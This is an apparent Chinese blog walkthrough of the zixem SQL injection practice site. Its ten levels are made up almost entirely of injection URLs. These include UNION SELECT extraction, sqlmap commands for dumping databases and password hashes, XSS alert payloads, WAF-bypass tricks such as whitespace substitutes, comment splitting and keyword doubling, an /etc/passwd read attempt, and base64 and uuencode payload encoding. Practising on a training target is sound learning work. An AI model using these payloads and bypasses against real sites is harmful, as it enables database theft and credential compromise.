• SQL Challenges靶机

    http://www.zixem.altervista.org/SQLi/

    第一关

    http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=1--+

    http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=2--+

    http://www.zixem.altervista.org/SQLi/level1.php?id=1 order by 4--+

    http://www.zixem.altervista.org/SQLi/level1.php?id=1%20order%20by%203--+

    http://www.zixem.altervista.org/SQLi/level1.php?id=-1%20union%20select%201,2,3--+

    sqlmap -u "注入点" --dbs 

    sqlmap -u "注入点" -D xx --tables 

    sqlmap -u "注入点" -D XX -T XX --columns 

    sqlmap -u "注入点" -D XX -T XX -C XX --dump 

    sqlmap -u "注入点" --users 

    sqlmap -u "注入点" --passwords 

    xss

    http://www.zixem.altervista.org/SQLi/level1.php?id=%3CScRiPt%3Ealert(1)%3C/sCrIpT%3E

    第二关

    http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=1--+

    http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=2--+

    http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%205--+

    http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%204--+

    http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4%27%20union%20select%201,2,3,4--+

    http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4' union select 1,database(),3,4--+

    第三关

    http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=1--+

    http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=2--+

    http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%205--+

    http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%204--+

    http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20union%20select%201,2,3,4--+

    http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,2,3,4--+

    http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,database(),3,4--+

    第四关

    http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=1--+

    http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=2--+

    http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20order%20by%205--+

    m.altervista.org/SQLi/level4.php?ebookid=7' order by 6--+

    http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,2,3,4,5--+

    http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,database(),3,4,5--+

    第五关

    http://www.zixem.altervista.org/SQLi/login_lvl5.php

    http://www.zixem.altervista.org/SQLi/md5cracker.php?hash=d1fd6ef9af6cb677e09b1b0a68301e0c

    第六关

    http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=1--+

    http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=2--+

    http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%205--+

    http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%204--+

    xss
    http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E

    sqlmap 跑盲注

    第七关

    http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=1--+

    http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=2--+

    http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by%203--+

    http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by4--+

    http://www.zixem.altervista.org/SQLi/level7.php?id=-1+union+select+1,2,3--+


    无回显

    http://www.zixem.altervista.org/SQLi/level7.php?id=-1+UNION+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--+

    第八关

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27%20and%201=1--+

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27/**/and/**/1=1--+

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1' and '1'='1--+

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1'/**/and/**/1=1--+

    特殊字符绕过

    A plus sign (+)

    A simple URL encoded space (%20)

    A null byte (%00)

    A newline (%0a)

    A tab (%09)

    A carriage return (%0d)

    构造poc

    空格%20

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1

    空字节%00

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%00and%001=1--+

    换行 %0a

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0aand%0a1=1--+

    回车%0d

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0dsand%0d1=1--+

    Tab %09
    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+

    Tab %09

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=2--+

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09order%09by%093--

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09select%091,2,3--

    大小写

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09sSelECT%091,2,3--

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09/*!SeLECt*/%091,2,3--

    url加密

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%2509union%2509select%25091,2,3--%20

    使用特殊字符   *

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09sel*ect%091,2,3--

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09se/**/lect%091,2,3--

    关键词替换

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09SEselectLECT%091,2,3--

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=2%09UNION%09ALL%09SELSELECTECT%091,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--

    第九关

    http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' and 1=1--

    http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20and%201=2--+

    http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' order by 2--+

    http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20order%20by%203--+

    http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' union select 1,2--+

    http://www.zixem.altervista.org/SQLi/lvl9.php?id=1 and 1=2' union select "../etc/passwd","2"--+

    第十关

    http://www.zixem.altervista.org/SQLi/lvl10.php?x=ISwwYGAKYAo=

    构造编码

    1 AND 1=2 UNION SELECT 1,2--

    使用Uuencode decoder 进行解码

    <,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+#(M+0```

    base64加密

    PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=

    http://www.zixem.altervista.org/SQLi/lvl10.php?x=PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=

    构造注入语句

    1 AND 1=2 UNION SELECT 1,CONCAT(user()," ",version())--

    结果

    M,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+$-/3D-!5"AU<V5R*"DL(B`B+'9E*<G-I;VXH*2DM+0```

    64编码

    TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg

    http://www.zixem.altervista.org/SQLi/lvl10.php?x=TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg


    参考文档 https://www.cnblogs.com/hack404/p/10387894.html
  • 相关阅读:
    精选css动画库及其使用
    使用js reduce方法求数组中出现次数最多的元素
    文字横向滚动效果,公告效果
    判断是否是微信端
    移动端input/textarea输入框光标高度兼容及其他事项
    更新被拒绝,因为您当前分支的最新提交落后于其对应的远程分支
    Git 常见问题整理
    CentOS 7.0 安装配置LAMP服务器方法(Apache+PHP+MariaDB)
    centos7安装eclipse
    centos7安装mplayer的方法
  • 原文地址:https://www.cnblogs.com/bingtang123/p/13298835.html
Copyright © 2020-2023  润新知